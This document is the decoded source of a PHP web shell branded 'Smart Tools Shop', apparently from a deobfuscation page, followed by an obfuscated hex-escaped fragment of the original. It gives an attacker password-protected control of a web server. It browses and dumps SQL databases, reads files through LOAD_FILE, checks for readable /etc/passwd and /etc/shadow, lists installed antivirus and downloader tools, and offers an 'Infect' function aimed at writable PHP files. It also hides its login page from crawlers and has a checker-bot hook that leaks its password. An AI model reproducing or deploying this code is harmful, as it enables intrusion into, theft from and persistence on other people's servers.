($charsets as $) { $opt_charsets .= "<option value="" . $ . "" " . ($_POST["charset"] == $ ? "selected" : '') . ">" . $ . "</option>"; } $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["\342\x96\233"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th>[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Shell:<br>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><a href="https://www.smarttoolsshop.pw">Smart Tools Shop</a> Edition. ( <a href="https://www.smarttoolsshop.date">www.smarttoolsshop.date</a> | <a href="https://www.smarttoolsshop.link">www.smarttoolsshop.link</a> | Check <a href="https://pastebin.com/raw/eYRCPvmP">https://pastebin.com/raw/eYRCPvmP</a> Incase the domains went down )<br><nobr>" . substr(@php_uname(), 0, 120) . " <a href="http://noreferer.de/?http://www.google.com/search?q=" . urlencode(@php_uname()) . "" target="_blank">[ Google ]</a> <a href="" . $explink . "" target=_blank>[ Exploit-DB ]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=#FFDB5F><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . viewSize($totalSpace) . " <span>Free:</span> " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)<br>" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">" . $opt_charsets . "</select></label><br><span>Server IP:</span><br>" . gethostbyname($_SERVER["HTTP_HOST"]) . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div>"; } goto qhLgb; hgt_8: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table hard2"); return array("file" => implode("
", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";

"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "NULL"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa\x9(" . implode(", ", $) . ")"; $head = false; } else { $sql .= "
	,(" . implode(", ", $) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";\xa\xa"); } else { echo ";\xa
"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download" && @$_POST["p1"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } hardHeader(); echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xa<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
<td><label><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" required></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<label><select name=sql_base><option value=''></option>"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select></label>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>\xa\x9	\x9	<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9\x9\x9</tr>
\x9\x9</table>\xa		<script>
            s_db='" . @addslashes($_POST["sql_base"]) . "';\xa            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.p1) f.p1.value='';\xa                    if(f.p2) f.p2.value='';\xa                    if(f.p3) f.p3.value='';\xa                }
            }
	\x9\x9function st(t,l) {\xa\x9			d.sf.p1.value = 'select';
\x9			d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
	\x9		d.sf.submit();
\x9	\x9}\xa\x9		function is() {\xa\x9	\x9	for(i=0;i<d.sf.elements['tbl[]'].length;++i)
\x9	\x9\x9	d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa			}
		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto gaWab; z59JV: if (isset($_POST["sts_checker_bot"])) { if ($_POST["sts_checker_bot"] == "checking") { echo "STS.ORIGINAL.SHELL"; die; } elseif ($_POST["sts_checker_bot"] == "getfullinfo") { $unzip = "1"; $mailer = "0"; if (!class_exists("ZipArchive")) { $unzip = "0"; } $rnd = rand(); if (@mail("[email protected]", "Email Sending Test Report ID: " . $rnd, "WORKING!")) { $mailer = "1"; } $the_os = php_uname("s"); $the_host = php_uname("n"); $the_machine_type = php_uname("m"); $the_version = phpversion(); $the_total_disk_space = formatSizeUnits(disk_total_space("/")); echo "STS.VERFIED.SHELL|" . $mailer . "|" . $unzip . "|" . $the_host . "|" . $the_os . "|" . $the_machine_type . "|" . $the_version . "|" . $the_total_disk_space; die; } elseif ($_POST["sts_checker_bot"] == "getpassword") { echo $pw_unhashed; die; } elseif ($_POST["sts_checker_bot"] == "emailcheck") { if (@mail($_POST["sts_checker_bot_email"], "Email sending tester, Item post date: " . $_POST["sts_checker_bot_itemdate"], "Test successful. Please use this 'Item post date' as reference to find that item: " . $_POST["sts_checker_bot_itemdate"])) { echo "true"; } else { echo "false"; } die; } } goto w2JVG; XXrTo: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto p2UEO; PnC_E: if (!empty($)) { if (isset($_REQUEST["pass"]) && md5($_REQUEST["pass"]) == $) { prototype(md5($_SERVER["HTTP_HOST"]), $); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $) { hardLogin(); } } goto Qz4tt; tR9xz: $pw_unhashed = md5(dirname(__FILE__) . $_SERVER["PHP_SELF"] . "!@#$%^&*()_+"); goto ee0Wn; l0Qok: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto MfY9i; Qz4tt: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto X14MH; MBmWc: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto vrXhM; MfY9i: echo "end"; goto OWyZK; OUica: $disable_functions = @ini_get("disable_functions"); goto J_363; vrXhM: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto MQqk2; u4WS6: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=red size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto G8cmK; H9x18: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto ZuuFx; eAtQG: if (PHP_VERSION_ID < 70000) { @set_magic_quotes_runtime(0); } goto mdCfK; NcQcO: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto rc2dt; R2HAO: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto PIzrX; DJcUw: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto NcQcO; TQhs6: $ = "FilesMan"; goto R2HAO; PYh2w: if (empty($_POST["a"])) { if (isset($) && function_exists("action" . $)) { $_POST["a"] = $; } else { $_POST["a"] = "FilesMan"; } } goto l0Qok; w2JVG: $ = true; goto TA8hx; dPBlO: @ini_set("max_execution_time", 0); goto Xz07I; W_qyb: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto O8Bkq; X14MH: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("<pre align=center><form method=post>Password<br><input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='Login' style='border:none;background-color: #ff0000;color:#fff;cursor:pointer;'></form></pre>"); }  ?>

Did this file decode correctly?

Original Code

{ $is_writable = is_writable($GLOBALS["\143\167\144"]) ? "\40\x3c\x66\157\156\x74\40\x63\x6f\154\x6f\x72\x3d\x27\43\106\106\104\102\65\x46\47\76\x5b\40\127\162\151\x74\x65\x61\142\x6c\x65\40\135\74\57\x66\x6f\x6e\164\76" : "\x20\74\146\x6f\156\x74\40\x63\157\x6c\x6f\162\x3d\x72\145\x64\x3e\50\116\157\164\x20\x77\x72\151\164\141\x62\x6c\x65\51\74\x2f\146\x6f\x6e\164\x3e"; echo "\12\x3c\57\x64\151\166\76\xa\x3c\x74\x61\142\x6c\x65\x20\143\154\141\x73\x73\x3d\151\x6e\x66\157\x20\151\x64\75\x74\157\157\154\x73\x54\x62\154\40\143\x65\x6c\x6c\x70\x61\x64\144\151\x6e\x67\75\x33\x20\143\145\154\x6c\x73\160\x61\143\151\156\x67\x3d\60\40\x77\151\x64\164\150\75\x31\x30\x30\x25\76\12\x9\74\164\162\x3e\xa\11\x9\74\164\144\76\x3c\146\157\x72\x6d\40\157\x6e\x73\x75\142\155\x69\164\x3d\x22" . (function_exists("\141\x63\164\151\157\156\106\x69\x6c\x65\x73\x4d\141\156") ? "\x67\50\x6e\165\154\154\x2c\164\150\x69\163\x2e\143\56\166\x61\154\165\x65\54\x27\x27\x29\x3b" : '') . "\162\145\164\165\162\156\x20\x66\x61\x6c\x73\x65\73\42\76\74\x73\160\x61\x6e\x3e\x43\150\141\x6e\147\145\40\x64\x69\x72\72\x3c\57\x73\x70\141\x6e\x3e\74\x62\x72\76\x3c\x69\156\x70\165\164\40\143\154\x61\163\x73\75\47\164\157\x6f\x6c\x73\111\x6e\x70\47\x20\164\171\160\x65\75\x74\145\x78\164\40\156\x61\155\145\75\x63\40\x76\x61\154\165\x65\75\x27" . htmlspecialchars($GLOBALS["\x63\167\x64"]) . "\47\x3e\x3c\x69\156\160\165\164\x20\x74\x79\x70\145\x3d\163\165\142\x6d\151\x74\40\166\x61\x6c\x75\x65\x3d\47\x73\x75\x62\x6d\x69\x74\x27\76\74\x2f\146\x6f\x72\155\76\x3c\x2f\x74\144\76\xa\11\x9\74\x74\x64\76\x3c\146\x6f\162\x6d\x20\157\156\x73\x75\x62\155\151\x74\x3d\x22" . (function_exists("\141\143\x74\151\x6f\x6e\106\151\154\x65\x73\x54\x6f\x6f\154\x73") ? "\147\50\x27\106\x69\x6c\x65\163\124\x6f\x6f\x6c\x73\x27\54\156\165\154\x6c\54\x74\150\x69\163\x2e\x66\x2e\166\141\x6c\x75\x65\x29\x3b" : '') . "\162\x65\x74\165\x72\156\x20\146\141\x6c\x73\x65\73\42\x3e\x3c\x73\x70\141\156\76\122\145\141\144\x20\146\x69\154\x65\x3a\x3c\x2f\x73\160\141\x6e\76\74\142\162\x3e\x3c\151\156\x70\165\x74\x20\x63\154\x61\163\x73\x3d\47\164\x6f\x6f\154\163\x49\x6e\160\x27\40\164\171\160\145\75\164\145\x78\x74\40\156\141\x6d\x65\x3d\x66\x20\x72\x65\161\x75\x69\x72\x65\x64\x3e\x3c\x69\x6e\x70\x75\x74\40\164\171\160\x65\x3d\x73\165\x62\155\x69\x74\40\166\141\x6c\165\x65\x3d\x27\x73\165\x62\x6d\x69\x74\x27\76\x3c\x2f\146\x6f\x72\155\76\x3c\x2f\x74\x64\x3e\12\x9\74\57\x74\x72\x3e\x3c\x74\162\x3e\xa\11\x9\74\164\x64\x3e\74\146\x6f\x72\x6d\x20\x6f\156\163\x75\x62\x6d\151\x74\75\42" . (function_exists("\x61\143\x74\151\x6f\x6e\x46\151\x6c\x65\x73\115\x61\156") ? "\147\x28\x27\106\x69\154\145\x73\x4d\x61\156\47\54\156\165\154\x6c\x2c\x27\155\153\x64\151\162\47\x2c\164\150\151\163\x2e\x64\56\166\141\154\x75\145\x29\73" : '') . "\x72\x65\x74\165\x72\156\40\x66\x61\x6c\x73\145\73\x22\x3e\74\x73\x70\x61\x6e\76\x4d\x61\x6b\x65\x20\144\x69\x72\x3a\x3c\57\x73\160\x61\156\76{$is_writable}\x3c\142\x72\x3e\74\x69\x6e\160\165\164\x20\x63\x6c\141\163\x73\75\x27\164\157\x6f\x6c\163\111\x6e\160\x27\40\x74\171\160\x65\75\x74\x65\x78\164\x20\156\x61\155\x65\x3d\144\x20\x72\145\161\x75\151\162\145\144\x3e\x3c\x69\156\160\165\x74\40\x74\x79\160\x65\x3d\163\x75\142\155\151\x74\40\166\141\x6c\x75\x65\75\47\163\165\x62\x6d\x69\x74\47\76\x3c\x2f\x66\x6f\x72\x6d\x3e\74\x2f\x74\144\76\12\x9\11\x3c\x74\144\x3e\x3c\x66\x6f\162\x6d\40\x6f\x6e\163\165\142\x6d\151\x74\x3d\x22" . (function_exists("\x61\x63\x74\x69\x6f\x6e\x46\151\154\145\x73\x54\157\157\x6c\x73") ? "\147\50\47\x46\x69\x6c\145\x73\x54\157\x6f\x6c\x73\x27\54\156\165\154\154\54\164\150\151\163\x2e\146\56\166\141\x6c\165\145\x2c\x27\x6d\153\x66\x69\154\145\x27\51\73" : '') . "\162\145\164\x75\x72\156\x20\x66\x61\x6c\163\145\x3b\x22\76\x3c\163\x70\141\156\76\x4d\141\x6b\145\40\146\x69\x6c\x65\72\x3c\x2f\163\x70\x61\156\76{$is_writable}\x3c\x62\x72\x3e\74\x69\x6e\x70\x75\164\40\x63\x6c\x61\x73\x73\75\x27\164\x6f\x6f\154\x73\111\x6e\160\x27\40\164\x79\160\x65\75\164\145\170\x74\x20\x6e\141\155\145\x3d\x66\x20\162\145\161\165\151\162\145\x64\76\74\151\x6e\x70\x75\x74\x20\x74\171\160\145\75\163\165\x62\x6d\x69\x74\x20\x76\141\x6c\165\x65\75\x27\163\x75\142\x6d\151\x74\x27\x3e\74\x2f\x66\x6f\162\155\76\x3c\x2f\x74\x64\x3e\xa\x9\x3c\57\x74\162\76\74\x74\162\76\12\x9\x9\74\x74\x64\x3e\x3c\146\157\x72\155\x20\157\x6e\163\x75\142\x6d\x69\164\75\42" . (function_exists("\141\143\x74\151\157\x6e\x43\x6f\x6e\163\x6f\x6c\145") ? "\147\50\47\x43\x6f\156\163\157\154\145\47\54\x6e\x75\154\x6c\x2c\x74\150\x69\163\x2e\143\x2e\166\141\154\165\x65\51\73" : '') . "\x72\x65\164\x75\x72\156\x20\146\x61\154\x73\x65\73\x22\x3e\74\163\160\x61\156\76\x45\x78\145\143\165\164\145\72\74\57\163\x70\141\156\x3e\74\142\162\x3e\74\x69\156\x70\165\x74\40\143\x6c\141\163\x73\75\x27\x74\x6f\157\x6c\x73\111\156\160\x27\40\x74\171\160\145\x3d\x74\145\170\x74\40\156\141\x6d\x65\75\x63\40\x76\141\x6c\x75\145\x3d\x27\x27\76\x3c\151\x6e\x70\165\x74\40\164\x79\x70\x65\75\163\165\142\x6d\x69\x74\40\166\x61\x6c\x75\145\75\47\x73\x75\142\155\x69\164\47\x3e\x3c\x2f\146\x6f\162\x6d\x3e\74\57\164\144\x3e\xa\11\11\74\x74\144\x3e\x3c\x66\x6f\x72\155\x20\x6d\x65\x74\x68\157\x64\x3d\x27\160\157\163\164\47\40" . (!function_exists("\x61\x63\x74\x69\x6f\x6e\x46\151\x6c\145\x73\115\141\x6e") ? "\x20\x6f\156\163\x75\x62\155\x69\x74\75\42\162\145\164\165\x72\x6e\40\x66\141\x6c\163\x65\x3b\42\x20" : '') . 